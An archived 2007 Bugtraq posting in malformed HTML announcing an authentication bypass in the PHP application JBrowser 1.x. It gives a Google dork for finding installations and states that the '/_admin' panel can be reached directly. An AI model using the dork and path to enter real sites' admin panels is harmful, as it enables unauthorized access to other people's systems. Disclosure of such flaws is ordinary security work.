lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20070223174952.1737.qmail@securityfocus.com> Date: 23 Feb 2007 17:49:52 -0000 From: crazy_king@...7.org To: bugtraq@...urityfocus.com Subject: JBrowser Acces to Admin Panel Exploit <html> <head> <title>JBrowser Acces to Admin Panel Exploit</title> JBrowser Acces to Admin Panel Exploit<p>Languane : PHP </p> <p>Version: 1.x</p> <p>Website : http://www.alizecheval.com/jbrowser/_admin/</head></p> <p>Author : sn0oPy</p> <p>Exploit Code : Cr@...King</p> <p> <body> Contact: <a href="mailto:crazy_king@...7.org">crazy_king@...7.org</a><br> </body> <br> Google Dork : inurl:"JBrowser/index.php"<body></body><body></body></p> <p> Exploit : <a href="http://siteadresi.com/patch/_admin"> http://siteadresi.com/patch/_admin</a> ---> Go To Admin Panel</p> <p> <body> <input type="button" name="http://siteadresi.com/patch/_admin" value="Administrator" style="font-family: Arial (sans-serif)" class="sd" id="asd"> </p> <b>Exploit Coded By Cr@...King</b> </body> </html>